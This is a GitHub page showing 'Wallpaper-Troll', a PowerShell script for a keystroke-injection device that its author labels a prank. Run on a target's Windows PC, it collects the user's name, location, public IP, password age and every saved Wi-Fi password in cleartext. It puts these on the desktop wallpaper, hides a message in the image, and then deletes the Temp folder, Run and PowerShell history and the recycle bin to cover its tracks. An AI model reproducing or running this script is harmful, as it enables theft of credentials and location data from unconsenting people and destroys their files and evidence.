-
Notifications
You must be signed in to change notification settings - Fork 0
/
wallpap.ps1
319 lines (245 loc) · 12.7 KB
/
wallpap.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.DESCRIPTION
This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
Public IP, and the SSID and WiFi password of any current or previously connected networks.
It will take the gathered information and generate a .jpg with that information on show
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned
Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop
#>
#############################################################################################################################################
# this is the message that will be coded into the image you use as the wallpaper
$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
# this will be the name of the image you use as the wallpaper
$ImageName = "dont-be-suspicious"
#############################################################################################################################################
<#
.NOTES
This will get the name associated with the microsoft account
#>
function Get-Name {
try {
$fullName = (Get-CimInstance -ClassName Win32_ComputerSystem).UserName
} catch {
Write-Error "No name was detected"
return $env:UserName
}
return $fullName
}
$fn = Get-Name
echo "Hey $fn" >> "$Env:temp\foo.txt"
echo "`nYour computer is not very secure" >> "$Env:temp\foo.txt"
#############################################################################################################################################
<#
.NOTES
This is to get the current Latitude and Longitude of your target
#>
function Get-GeoLocation {
try {
Add-Type -AssemblyName System.Device
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher
$GeoWatcher.Start()
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100
}
if ($GeoWatcher.Permission -eq 'Denied') {
Write-Error 'Access Denied for Location Information'
return "No Coordinates found"
} else {
$location = $GeoWatcher.Position.Location
return "Latitude: $($location.Latitude), Longitude: $($location.Longitude)"
}
} catch {
Write-Error "No coordinates found"
return "No Coordinates found"
}
}
$GL = Get-GeoLocation
if ($GL) { echo "`nYour Location: `n$GL" >> "$Env:temp\foo.txt" }
#############################################################################################################################################
<#
.NOTES
This will get the public IP from the target computer
#>
function Get-PubIP {
try {
$computerPubIP = (Invoke-WebRequest -Uri "http://ipinfo.io/ip" -UseBasicParsing).Content.Trim()
} catch {
Write-Error "No Public IP was detected"
return $null
}
return $computerPubIP
}
$PubIP = Get-PubIP
if ($PubIP) { echo "`nYour Public IP: $PubIP" >> "$Env:temp\foo.txt" }
###########################################################################################################
<#
.NOTES
Password last Set
This function will custom tailor a response based on how long it has been since they last changed their password
#>
function Get-Days_Set {
try {
$pls = (net user $env:USERNAME | Select-String -Pattern "Password last set").ToString().Trim()
$pls = $pls.Substring($pls.IndexOf(":") + 1).Trim()
$time = ((Get-Date) - [datetime]$pls).Days
return $pls
} catch {
Write-Error "Day password set not found"
return $null
}
}
$pls = Get-Days_Set
if ($pls) { echo "`nPassword Last Set: $pls" >> "$Env:temp\foo.txt" }
###########################################################################################################
<#
.NOTES
All Wifi Networks and Passwords
This function will gather all current Networks and Passwords saved on the target computer
They will be saved in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
#>
# Get Wifi SSIDs and Passwords
$WLANProfileNames =@()
# Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -Pattern " : "
# Trim the output to receive only the name
Foreach($WLANProfileName in $Output) {
$WLANProfileNames += ($WLANProfileName -split ":")[1].Trim()
}
$WLANProfileObjects =@()
# Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames) {
try {
$WLANProfilePassword = (netsh.exe wlan show profiles name="$WLANProfileName" key=clear | Select-String -Pattern "Key Content").ToString().Split(":")[1].Trim()
} catch {
$WLANProfilePassword = "The password is not stored in this profile"
}
$WLANProfileObject = [PSCustomObject]@{
ProfileName = $WLANProfileName
ProfilePassword = $WLANProfilePassword
}
$WLANProfileObjects += $WLANProfileObject
}
if ($WLANProfileObjects) {
echo "`nW-Lan profiles: ===============================" >> "$Env:temp\foo.txt"
$WLANProfileObjects | ForEach-Object { echo "$($_.ProfileName) : $($_.ProfilePassword)" >> "$Env:temp\foo.txt" }
}
#############################################################################################################################################
<#
.NOTES
This will get the dimension of the targets screen to make the wallpaper
#>
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class PInvoke {
[DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
[DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
}
"@
$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
#############################################################################################################################################
<#
.NOTES
This will get take the information gathered and format it into a .jpg
#>
Add-Type -AssemblyName System.Drawing
$filename = "$env:temp\foo.jpg"
$bmp = New-Object System.Drawing.Bitmap $w, $h
$font = New-Object System.Drawing.Font "Consolas", 18
$brushBg = [System.Drawing.Brushes]::White
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg, 0, 0, $bmp.Width, $bmp.Height)
$content = Get-Content "$Env:temp\foo.txt" -Raw
$graphics.DrawString($content, $font, $brushFg, 500, 100)
$graphics.Dispose()
$bmp.Save($filename)
#############################################################################################################################################
<#
.NOTES
This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
Then it will clean up the files you don't want to leave behind
#>
echo $hiddenMessage > "$Env:temp\foo.txt"
cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
Remove-Item "$env:TEMP\foo.txt", "$env:TEMP\foo.jpg" -Force -ErrorAction SilentlyContinue
#############################################################################################################################################
<#
.NOTES
This will take the image you generated and set it as the targets wallpaper
#>
function Set-WallPaper {
param (
[parameter(Mandatory=$true)]
[string]$Image,
[parameter(Mandatory=$false)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style = "Center"
)
$WallpaperStyle = Switch ($Style) {
"Fill" { "10" }
"Fit" { "6" }
"Stretch" { "2" }
"Tile" { "0" }
"Center" { "0" }
"Span" { "22" }
}
if ($Style -eq "Tile") {
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -Value $WallpaperStyle
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -Value 1
} else {
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -Value $WallpaperStyle
Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -Value 0
}
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class Params {
[DllImport("User32.dll", CharSet = CharSet.Unicode)]
public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
[Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $UpdateIniFile -bor $SendChangeEvent)
}
#############################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
function Clean-Exfil {
# Delete contents of Temp folder
Remove-Item "$env:TEMP\*" -Recurse -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f
# Delete powershell history
Remove-Item (Get-PSReadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
#############################################################################################################################################
# Set the wallpaper and clean up
Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
Clean-Exfil